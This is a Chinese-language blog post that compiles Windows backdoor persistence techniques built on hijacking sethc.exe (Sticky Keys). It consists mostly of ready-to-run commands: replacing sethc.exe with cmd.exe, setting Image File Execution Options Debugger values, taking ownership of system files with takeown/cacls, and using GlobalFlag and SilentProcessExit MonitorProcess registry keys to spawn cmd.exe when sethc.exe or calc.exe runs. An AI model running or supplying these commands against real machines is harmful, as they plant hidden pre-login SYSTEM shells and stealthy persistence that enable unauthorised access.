分类 网络安全 下的文章

使用GlobalFlags劫持任意进程镜像持久化/sethc.exe在不同版本后门应用整理

[toc]

windows 2k3

单条命令执行

windows 2003/xp
这种方式就比较普遍了
利用copy来替换sethc.exe

copy c:\windows\system32\sethc.exe c:\windows\system32\sethc2.exe
copy c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe

windows 2008/win7

单条命令执行

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v "Debugger" /t REG_SZ /d "cmd.exe" /f

Jietu20191216-164505
或者还可以使用上面的功能。不过需要修改权限。
所有文件及文件夹、子文件夹下的所有者更改为管理员组(administrators)

takeown /f c:\windows\system32\sethc.*   /a /r /d y
cacls  c:\windows\system32\sethc.*  /T /E /G administrators:F

-w806

多条命令执行

在看到近期一个表哥发的文章可以利用映像劫持的方式留shift后门,在5下shift后成功弹出了sethc,然后还可以在执行恶意文件
其中利用的方式

Shfit映像劫持后门新玩法

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v GlobalFlag /t REG_DWORD /d 512 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\sethc.exe" /v ReportingMode /t REG_DWORD /d 1  /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\sethc.exe" /v MonitorProcess /t REG_SZ /d "c:\windows\system32\cmd.exe" /f

Jietu20191216-152933

Global Flags劫持任意exe镜像

上面的文章中提到了Globalflags,这个工具是包含在 Debugging Tools for Windows(WinDbg)下的。
本地可以利用winsdk_web.exe去安装。

-w588

点击应用后在打开notepad后

这里是利用gflags的监视进程把监视进程设置成cmd.exe,原理就是修改了三个注册表内容,添加了MonitorProcess的键值。

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\calc.exe" /v GlobalFlag /t REG_DWORD /d 512 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\calc.exe" /v ReportingMode /t REG_DWORD /d 1  /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\calc.exe" /v MonitorProcess /t REG_SZ /d "c:\windows\system32\cmd.exe" /f

https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/
https://payloads.cn/2019/1205/shfit-image-hijacks-backdoor-new-gameplay.html
https://www.anquanke.com/post/id/151425